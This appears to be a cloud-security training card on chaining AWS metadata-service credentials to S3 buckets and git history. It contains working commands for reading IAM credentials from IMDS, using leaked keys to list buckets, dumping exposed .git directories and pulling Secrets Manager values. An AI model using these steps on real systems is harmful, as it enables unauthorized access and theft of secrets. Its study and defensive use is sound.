AWS S3 Bucket OSINT Enumeration: Public Bucket Discovery and Sensitive Data Identification
Theory
Why This Matters
The IMDS-to-S3-to-Git intelligence chain represents one of the most impactful credential exposure pathways in cloud environments. In the 2019 Capital One breach, an SSRF vulnerability allowed access to the AWS Instance Metadata Service (IMDS), yielding temporary IAM credentials that were used to enumerate and exfiltrate over 100 million customer records from S3. Beyond direct SSRF exploitation, threat intelligence analysts find IMDS-sourced credentials appearing in public breach databases, Pastebin dumps, and GitHub repositories — uploaded accidentally by developers who logged cloud environment variables. For investigators, the intelligence value lies in the chain: a single credential leak exposes not just one bucket but potentially entire code repositories, additional credential stores, and development secrets. This chain is also the starting point for assessing an organization's cloud security posture in authorized red team engagements.
Core Concept
The AWS Instance Metadata Service (IMDS) is an HTTP endpoint available by default to EC2 instances at the link-local address 169.254.169.254. It provides instance identity documents, user data, and, most critically, temporary IAM credentials for the IAM role attached to the instance. These credentials are served at http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME. Under IMDSv1, any process on the instance can read them without authentication, as can any request an SSRF flaw causes the instance to issue. IMDSv2 (the hardened version) requires a session token, obtained via a PUT request, to be sent in a header on every subsequent GET. Many instances still permit IMDSv1 for application compatibility.
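You can see whether an instance still answers unauthenticated IMDSv1 GETs in its `MetadataOptions`. The sketch below is a minimal example. It assumes the JSON that `aws ec2 describe-instances` prints, with a made-up sample inlined and hypothetical instance IDs. It flags instances where the endpoint is enabled and `HttpTokens` is `"optional"`:

```python
import json


def imdsv1_exposed(describe_instances_json: str) -> list:
    """Return IDs of instances that still accept IMDSv1 requests.

    Expects the JSON printed by `aws ec2 describe-instances`. An instance is
    flagged when its metadata endpoint is enabled and HttpTokens is
    "optional" (session tokens not enforced, so plain GETs still work).
    """
    data = json.loads(describe_instances_json)
    exposed = []
    for reservation in data.get("Reservations", []):
        for instance in reservation.get("Instances", []):
            opts = instance.get("MetadataOptions", {})
            endpoint_on = opts.get("HttpEndpoint", "enabled") == "enabled"
            if endpoint_on and opts.get("HttpTokens") == "optional":
                exposed.append(instance["InstanceId"])
    return exposed


# Hypothetical sample shaped like describe-instances output
sample = json.dumps({
    "Reservations": [{
        "Instances": [
            {"InstanceId": "i-0aaa", "MetadataOptions": {"HttpTokens": "optional", "HttpEndpoint": "enabled"}},
            {"InstanceId": "i-0bbb", "MetadataOptions": {"HttpTokens": "required", "HttpEndpoint": "enabled"}},
            {"InstanceId": "i-0ccc", "MetadataOptions": {"HttpTokens": "optional", "HttpEndpoint": "disabled"}},
        ]
    }]
})
print(imdsv1_exposed(sample))  # ['i-0aaa']
```

In practice the input would come from `aws ec2 describe-instances > instances.json`. Once an instance's software is confirmed to support session tokens, you can switch it to IMDSv2-only with `aws ec2 modify-instance-metadata-options --instance-id ID --http-tokens required`.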
When IMDS credentials appear in breach data or public repositories, they arrive as a triplet: AccessKeyId, SecretAccessKey, and Token. The Token is the session token that marks them as temporary STS credentials, and the triplet usually comes with an Expiration timestamp. Before any active use, analysts validate the credential with aws sts get-caller-identity. This is a read-only, low-risk API call that returns the IAM identity without touching any data. GetCallerIdentity requires no IAM permissions, so it succeeds for any valid, unexpired credential regardless of how narrowly the role is scoped. This is standard operational practice: it confirms the credential is valid and reveals the IAM role name and account ID, which guide further enumeration.
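The `Arn` in the get-caller-identity response already encodes the account ID and role name. The small parser below makes that explicit. It is a sketch that assumes only assumed-role and IAM user ARNs need special handling. For IMDS-sourced credentials, the session-name component is typically the EC2 instance ID, which ties the leak back to a specific host.

```python
import json


def describe_identity(caller_identity_json: str) -> dict:
    """Split the Arn returned by `aws sts get-caller-identity` into parts.

    ARN layout: arn:partition:service:region:account-id:resource
    """
    ident = json.loads(caller_identity_json)
    _, _, service, _, account, resource = ident["Arn"].split(":", 5)
    info = {"account": account, "kind": resource.split("/", 1)[0], "name": None, "session": None}
    if service == "sts" and info["kind"] == "assumed-role":
        # assumed-role/ROLE_NAME/SESSION_NAME
        _, info["name"], info["session"] = resource.split("/", 2)
    elif service == "iam" and info["kind"] == "user":
        # user/[path/]USER_NAME: the name is the last path component
        info["name"] = resource.rsplit("/", 1)[-1]
    return info


# Hypothetical output for an instance-profile credential (all IDs are placeholders)
sample = json.dumps({
    "UserId": "AROAEXAMPLEROLEID:i-0123456789abcdef0",
    "Account": "123456789012",
    "Arn": "arn:aws:sts::123456789012:assumed-role/WebAppRole/i-0123456789abcdef0",
})
print(describe_identity(sample))
```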
S3 bucket enumeration with recovered credentials starts with aws s3 ls. With no arguments, this calls ListBuckets, which needs s3:ListAllMyBuckets. If that call succeeds, it returns every bucket in the account, not only the buckets the role can read. Even roles with limited policies may have s3:ListAllMyBuckets or s3:GetObject on specific paths. The key pivot is finding S3 buckets that contain git repositories. These are either raw .git directories uploaded by CI/CD pipelines or .bundle files created by git bundle create. A .git directory downloaded from S3 can be restored to a full repository with git clone, and git clone also accepts a .bundle file directly.
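The pivot can be automated over the text that `aws s3 ls s3://bucket-name/ --recursive` prints. This sketch assumes the CLI's default `<date> <time> <size> <key>` line layout and uses a made-up listing. It treats any key ending in `.git/HEAD` as a repository root, since every git directory contains a HEAD file.

```python
def find_git_artifacts(ls_output: str) -> dict:
    """Locate .git directories and git bundles in `aws s3 ls --recursive` output.

    Each object line looks like: "<date> <time> <size> <key>". Splitting at most
    three times keeps keys that contain spaces intact.
    """
    git_dirs, bundles = set(), []
    for line in ls_output.splitlines():
        fields = line.split(maxsplit=3)
        if len(fields) < 4:
            continue  # blank lines or "PRE prefix/" rows from non-recursive listings
        key = fields[3]
        if key == ".git/HEAD" or key.endswith("/.git/HEAD"):
            # Every git directory has a HEAD file, so it marks the repository root
            git_dirs.add(key[: -len("HEAD")])
        elif key.endswith(".bundle"):
            bundles.append(key)
    return {"git_dirs": sorted(git_dirs), "bundles": bundles}


# Hypothetical listing; bucket contents are made up for illustration
listing = """\
2024-03-02 09:14:55         23 app/.git/HEAD
2024-03-02 09:14:55        312 app/.git/config
2024-03-02 09:15:01    1048576 backups/site.bundle
2024-03-02 09:15:07        982 README.md
"""
print(find_git_artifacts(listing))  # {'git_dirs': ['app/.git/'], 'bundles': ['backups/site.bundle']}
```

A prefix such as `app/.git/` can then be pulled with `aws s3 sync s3://bucket-name/app/.git/ ./recovered.git/` and cloned. A bundle can be cloned directly with `git clone site.bundle restored_repo`.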
Exposed .git directories on web servers are a parallel discovery path. When a developer deploys by uploading the entire project directory, including the .git folder, GET /.git/config returns the git remote URL and branch structure. It sometimes also returns credentials embedded in the remote URL (https://user:token@host/...). GitDump automates extraction: it fetches /.git/HEAD, /.git/config, /.git/COMMIT_EDITMSG, and the pack files it can locate, then reconstructs the repository locally. truffleHog scans the recovered git history for high-entropy strings and known credential patterns across every commit, not just the current HEAD.
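Credentials in `.git/config` most often sit in a remote URL of the form `https://user:token@host/...`. The sketch below flags such remotes and redacts the secret in its output. It uses a deliberately small line-based parser, on the assumption that git's includes, quoting rules, and other corners of the config syntax can be ignored here. The sample config and token are made up.

```python
import re
from urllib.parse import urlsplit

# Section headers: [core], [remote "origin"], [branch "main"]
SECTION = re.compile(r'^\s*\[\s*([^\]\s"]+)(?:\s+"([^"]*)")?\s*\]')
# url / pushurl entries inside a section
URL_LINE = re.compile(r'^\s*(?:push)?url\s*=\s*(\S+)', re.IGNORECASE)


def remotes_with_credentials(config_text: str) -> list:
    """Return (remote, redacted_url) pairs for HTTP(S) remotes with embedded userinfo."""
    findings = []
    section = remote = None
    for line in config_text.splitlines():
        header = SECTION.match(line)
        if header:
            section, remote = header.group(1).lower(), header.group(2)
            continue
        entry = URL_LINE.match(line)
        if section == "remote" and entry:
            parts = urlsplit(entry.group(1).strip('"'))
            if parts.scheme in ("http", "https") and parts.username:
                # Drop the user:token part so the report does not re-leak it
                host = parts.netloc.rsplit("@", 1)[1]
                findings.append((remote, f"{parts.scheme}://***@{host}{parts.path}"))
    return findings


# Hypothetical .git/config contents
sample_config = (
    "[core]\n"
    "\trepositoryformatversion = 0\n"
    '[remote "origin"]\n'
    "\turl = https://deploy:ghp_EXAMPLEONLY@github.com/example-org/app.git\n"
    "\tfetch = +refs/heads/*:refs/remotes/origin/*\n"
    '[remote "mirror"]\n'
    "\turl = git@github.com:example-org/app.git\n"
    '[branch "main"]\n'
    "\tremote = origin\n"
)
print(remotes_with_credentials(sample_config))
```

SSH-style remotes such as `git@github.com:...` are skipped on purpose, because they authenticate with keys stored outside the config file.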
Technical Deep-Dive
```bash
# IMDSv1 credential retrieval (for authorized testing / understanding the exposure)
# Step 1: Discover the attached IAM role name
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Step 2: Retrieve the temporary credentials
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME
# Returns JSON with AccessKeyId, SecretAccessKey, Token, Expiration

# IMDSv2 (token-based): PUT for a session token, then send it as a header
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" \
  -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
  http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME

# Credential validation (ALWAYS the first step: read-only, safe)
export AWS_ACCESS_KEY_ID=ASIA...
export AWS_SECRET_ACCESS_KEY=...
export AWS_SESSION_TOKEN=...
aws sts get-caller-identity
# Returns: Account, UserId, Arn (confirms validity and reveals the role name)

# S3 enumeration with recovered credentials
aws s3 ls                      # ListBuckets: all buckets in the account (needs s3:ListAllMyBuckets)
aws s3 ls s3://bucket-name/    # List one bucket's top-level contents
aws s3 ls s3://bucket-name/ --recursive | grep -E '\.git/|\.bundle$|\.tar\.gz$'

# s3scanner: unauthenticated bucket permission assessment
pip install s3scanner
s3scanner scan --bucket company-backup
# Reports: exists, listable, readable, writable (without credentials)

# GitDump: extract an exposed .git directory from a web server
# (script name and arguments may differ between versions; check the README)
git clone https://github.com/Ebryx/GitDump.git
python3 GitDump/gitdump.py -u https://target.com/.git/ -o recovered_repo/
# Then restore the working tree (the subshell keeps the current directory unchanged)
(cd recovered_repo && git checkout -- .)

# truffleHog v3: scan the recovered git history for secrets
# --json emits one object per line, so json.tool needs --json-lines (Python 3.8+)
trufflehog git file://./recovered_repo/ --json |
  python3 -m json.tool --json-lines | grep -E '"DetectorName"|"Raw"' | head -40

# GitHub organization-wide secret scan (authorized)
trufflehog github --org=target-org --token="$GITHUB_TOKEN" --json |
  python3 -m json.tool --json-lines | grep -iE '"DetectorName"|"Repository"|"Raw"'
```
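Running grep over pretty-printed JSON loses the link between a detector name and the commit it came from. As an alternative, this sketch parses the `--json` stream directly. It assumes truffleHog v3's field names (`DetectorName`, `Verified`, `Raw`, and `SourceMetadata.Data.Git.commit`/`file`), which are worth confirming against the installed version. The findings in the sample are made up.

```python
import json
from collections import Counter


def summarize_trufflehog(jsonl: str):
    """Summarize truffleHog --json output (one JSON object per line).

    Field names follow truffleHog v3's JSON output as assumed here; .get()
    defaults keep the sketch tolerant of versions that differ.
    """
    counts, rows = Counter(), []
    for line in jsonl.splitlines():
        line = line.strip()
        if not line.startswith("{"):
            continue  # skip blank lines and any non-JSON log output
        finding = json.loads(line)
        detector = finding.get("DetectorName", "unknown")
        counts[detector] += 1
        git = finding.get("SourceMetadata", {}).get("Data", {}).get("Git", {})
        raw = finding.get("Raw", "")
        rows.append({
            "detector": detector,
            "verified": bool(finding.get("Verified")),
            "commit": git.get("commit", "")[:10],
            "file": git.get("file", ""),
            "preview": raw[:4] + "..." if raw else "",  # never print the full secret
        })
    return counts, rows


# Hypothetical findings shaped like truffleHog git-source output
sample = "\n".join(json.dumps(f) for f in [
    {"DetectorName": "AWS", "Verified": True, "Raw": "AKIAEXAMPLEONLY",
     "SourceMetadata": {"Data": {"Git": {"commit": "0123456789abcdef", "file": "deploy/.env"}}}},
    {"DetectorName": "Github", "Verified": False, "Raw": "ghp_exampleonly",
     "SourceMetadata": {"Data": {"Git": {"commit": "fedcba9876543210", "file": "ci.yml"}}}},
    {"DetectorName": "AWS", "Verified": False, "Raw": "AKIAOTHEREXAMPLE",
     "SourceMetadata": {"Data": {"Git": {"commit": "1111111111111111", "file": "old/config.py"}}}},
])
counts, rows = summarize_trufflehog(sample)
print(dict(counts))  # {'AWS': 2, 'Github': 1}
for row in rows:
    print(row)
```

In use, the scan output would be redirected to a file (for example `trufflehog git file://./recovered_repo/ --json > findings.jsonl`), and that file would be read in place of the inline sample.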
```python
# Parse IMDS credential JSON from a breach dump entry
import datetime
import json

raw = '''{
  "Code": "Success",
  "Type": "AWS-HMAC",
  "AccessKeyId": "ASIAQ3EXAMPLE12345",
  "SecretAccessKey": "wJalrXUtnFEMI/EXAMPLE/bPxRfiCYEXAMPLEKEY",
  "Token": "AQoXnyc4lcK4w==...",
  "Expiration": "2024-11-15T18:22:30Z"
}'''

creds = json.loads(raw)
# fromisoformat() only accepts a trailing "Z" from Python 3.11 on, so normalize it
exp = datetime.datetime.fromisoformat(creds["Expiration"].replace("Z", "+00:00"))
now = datetime.datetime.now(datetime.timezone.utc)
is_expired = now > exp

# ASIA prefix = temporary credentials from STS AssumeRole / IMDS
# AKIA prefix = long-term IAM user credentials (no expiry)
prefix = creds["AccessKeyId"][:4]
key_type = {
    "ASIA": "temporary (STS/role)",
    "AKIA": "long-term (IAM user)",
}.get(prefix, f"unrecognized prefix {prefix}")
print(f"Key type : {key_type}")
print(f"Expired  : {is_expired} (expiry: {exp})")
```
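The high-entropy heuristic from the Core Concept can be illustrated by computing Shannon entropy over base64-like runs. This is a simplified sketch, not truffleHog's implementation. The 20-character minimum and the 4.5 bits-per-character cutoff are tunable assumptions; 4.5 mirrors the base64 threshold of the legacy truffleHog 2.x scanner.

```python
import math
import re
from collections import Counter

# Runs of base64-alphabet characters long enough to plausibly be a key
BASE64_RUN = re.compile(r"[A-Za-z0-9+/=]{20,}")


def shannon_entropy(s: str) -> float:
    """Bits per character, computed from the string's own character frequencies."""
    if not s:
        return 0.0
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in Counter(s).values())


def high_entropy_tokens(text: str, threshold: float = 4.5) -> list:
    """Return base64-like runs whose entropy exceeds the threshold."""
    return [tok for tok in BASE64_RUN.findall(text) if shannon_entropy(tok) > threshold]


# Made-up sample: one random-looking value and one repetitive one
text = "token: AbCdEfGhIjKlMnOpQrStUvWxYz012345 note: passwordpasswordpassword"
for tok in BASE64_RUN.findall(text):
    print(f"{shannon_entropy(tok):.2f}  {tok}")
print(high_entropy_tokens(text))
```

Pure entropy cuts both ways. The sample SecretAccessKey above, with its repeated EXAMPLE filler, scores about 4.38 and would slip under the cutoff, while hashes and random IDs get flagged. This is one reason detector-based scanning complements entropy. Detector-based scanning means pattern-specific matching plus live verification, which is the approach truffleHog v3 takes.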
Intelligence Collection Methodology
- Search breach data and public repositories: Query the Have I Been Pwned API for the organization's domain to identify known breaches (domain search requires verifying control of the domain). Search GitHub for `ASIA` (the temporary AWS key prefix) using the `org:target-org` qualifier. Use theHarvester to enumerate the organization's email domain, then cross-reference the results against credential leak databases.
- Validate any discovered credentials safely: Set the `AWS_ACCESS_KEY_ID`, `AWS_SECRET_ACCESS_KEY`, and `AWS_SESSION_TOKEN` environment variables and run `aws sts get-caller-identity`. This single read-only call confirms validity without modifying any resources. Log the returned IAM ARN for documentation.
- Enumerate accessible S3 buckets: Run `aws s3 ls` with the recovered credentials. For each bucket, run `aws s3 ls s3://bucket-name/ --recursive` and grep for `.git/`, `.bundle`, `.env`, `id_rsa`, `*.pem`, and `*.key` indicators.
- Download and restore any discovered git repositories: Run `aws s3 sync s3://bucket-name/.git/ ./recovered.git/`, then `git clone recovered.git/ restored_repo/`. For web-exposed `.git` directories, use GitDump to reconstruct the repository from HTTP-accessible objects.
- Scan all recovered git history: Run truffleHog over the entire git history (`trufflehog git file://./restored_repo/`) to identify secrets committed at any point, not just those in the current HEAD. Git history commonly contains credentials that were deleted from working files but remain in past commits.
- Map the IAM permission boundary: Use Pacu (an AWS exploitation framework; authorized use only), or enumerate manually to understand what the recovered role can access. The manual commands are `aws iam get-role --role-name ROLE_NAME`, `aws iam list-role-policies --role-name ROLE_NAME` (inline policies), and `aws iam list-attached-role-policies --role-name ROLE_NAME` (managed policies). A narrowly scoped role may itself be denied these IAM read calls. The result defines the scope of potential exposure.
- Enumerate additional secret stores: From git history, extract any references to AWS Secrets Manager ARNs or SSM Parameter Store paths. Attempt retrieval with the recovered credentials: `aws secretsmanager get-secret-value --secret-id SECRET_ARN` or `aws ssm get-parameter --name PARAMETER_NAME --with-decryption`.
- Document the full chain: Record each hop: breach source → credential type (IMDS temporary vs IAM long-term) → IAM role ARN → accessible buckets → discovered repositories → secrets found in history. This chain of evidence is essential for incident reporting.
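The secret-store step can start with a regex pass over git history, for example the text of `git log --all -p`. The patterns below are assumptions based on the ARN layouts for Secrets Manager secrets and SSM parameters. Plain parameter paths that appear without an ARN would need looser, project-specific matching. The diff fragment and account ID are placeholders.

```python
import re

# arn:<partition>:secretsmanager:<region>:<account-id>:secret:<name>-<suffix>
SECRET_ARN = re.compile(
    r"arn:aws(?:-cn|-us-gov)?:secretsmanager:[a-z0-9-]+:\d{12}:secret:[A-Za-z0-9/_+=.@-]+"
)
# arn:<partition>:ssm:<region>:<account-id>:parameter/<path>
SSM_ARN = re.compile(
    r"arn:aws(?:-cn|-us-gov)?:ssm:[a-z0-9-]+:\d{12}:parameter/[A-Za-z0-9/_.-]+"
)


def secret_store_refs(text: str) -> dict:
    """Collect unique Secrets Manager and SSM parameter ARNs found in text."""
    return {
        "secretsmanager": sorted(set(SECRET_ARN.findall(text))),
        "ssm": sorted(set(SSM_ARN.findall(text))),
    }


# Made-up diff fragment; account ID and names are placeholders
history = """
+DB_SECRET_ARN=arn:aws:secretsmanager:us-east-1:123456789012:secret:prod/db-AbC123
-# arn:aws:ssm:eu-west-1:123456789012:parameter/prod/api/key
+DB_SECRET_ARN=arn:aws:secretsmanager:us-east-1:123456789012:secret:prod/db-AbC123
"""
print(secret_store_refs(history))
```

Each Secrets Manager hit is a `--secret-id` value for the `get-secret-value` call above. For an SSM ARN, the parameter name is the part after `parameter`, with a leading slash added (here `/prod/api/key`).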
Common Intelligence Collection Errors
- Using recovered cloud credentials for active enumeration before validation: Running broad enumeration commands (e.g., `aws s3 ls --recursive` across all buckets) with unvalidated or expired credentials generates API calls that can appear in the target account's CloudTrail logs and may trigger security alerts. Always validate with `aws sts get-caller-identity` first, then scope enumeration to the minimum necessary.
- Treating AKIA and ASIA key prefixes identically: `AKIA` prefixes indicate long-term IAM user credentials with no automatic expiration, which is extremely high severity. `ASIA` prefixes indicate temporary STS credentials with a defined expiration (visible in the `Expiration` field). Misclassifying one as the other leads to an incorrect severity assessment.
- Scanning only the HEAD of a recovered git repository: The credential behind a breach has often already been removed from the current HEAD. truffleHog's value lies specifically in scanning every commit across all branches. `git log --all --oneline` and `git stash list` reveal additional commits and stashes to scan.
- Missing `.git` directory exposure because the directory listing returns 403: Web servers may forbid directory listing of `/.git/` while still serving individual files. Always test `GET /.git/HEAD` and `GET /.git/config` directly, as these files are frequently accessible even when directory listing is disabled.
- Overlooking user data as a credential source: The IMDS `user-data` endpoint (`/latest/user-data`) returns the instance initialization script, which developers frequently populate with environment variables that include credentials. This endpoint is separate from the IAM credentials endpoint and is often overlooked.
- Assuming s3scanner output is definitive: s3scanner tests a fixed set of permissions (list, read, write). IAM policies may allow specific object-level operations (e.g., `s3:GetObject` on specific paths) that s3scanner's bucket-level checks do not reveal. Manual testing of specific paths is required after s3scanner flags a bucket.
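Testing `/.git/HEAD` directly also needs a check on the response content, because some servers answer missing paths with a 200 and a generic HTML page. Here is a minimal sketch of that check. It assumes the response status and body have already been fetched with whatever HTTP client the engagement uses, and the 1024-byte size cap is an arbitrary illustrative limit.

```python
import re

# A genuine .git/HEAD holds either a symbolic ref ("ref: refs/heads/main")
# or, for a detached HEAD, a bare object ID: 40 hex digits (SHA-1) or 64 (SHA-256).
HEAD_PATTERN = re.compile(r"(ref: refs/\S+|[0-9a-f]{40}|[0-9a-f]{64})\s*")


def looks_like_git_head(status: int, body: bytes) -> bool:
    """Return True only if the response body has the shape of a real HEAD file."""
    if status != 200 or len(body) > 1024:
        return False  # HEAD is tiny; large bodies are almost certainly error pages
    try:
        text = body.decode("ascii")
    except UnicodeDecodeError:
        return False
    return HEAD_PATTERN.fullmatch(text) is not None


print(looks_like_git_head(200, b"ref: refs/heads/main\n"))                 # True
print(looks_like_git_head(200, b"<html><body>Not Found</body></html>"))    # False
```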
NICE Framework Alignment
| Code | Knowledge/Skill/Task Statement | How This Card Develops It |
|---|---|---|
| K0058 | Knowledge of network protocols | Understanding HTTP link-local addressing for IMDS access and AWS S3 REST API structure for bucket enumeration |
| K0145 | Knowledge of security assessment approaches | Executing a structured IMDS-to-S3-to-Git credential intelligence chain with defined validation and documentation steps |
| K0272 | Knowledge of network security architecture | Mapping how IAM roles, instance profiles, temporary STS credentials, and S3 bucket policies interact to define the cloud credential attack surface |
| K0427 | Knowledge of encryption algorithms | Distinguishing credential types by prefix (AKIA vs ASIA) and understanding STS token expiration as a security control; recognizing high-entropy string signatures that truffleHog uses to identify secrets |
| S0040 | Skill in identifying and extracting data of interest from various sources | Extracting credentials from breach data, git history, and S3 bucket contents using truffleHog, GitDump, and aws CLI |
| T0569 | Apply and utilize authorized cyber capabilities to achieve objectives | Deploying s3scanner, GitDump, truffleHog, and AWS CLI in authorized cloud intelligence collection engagements |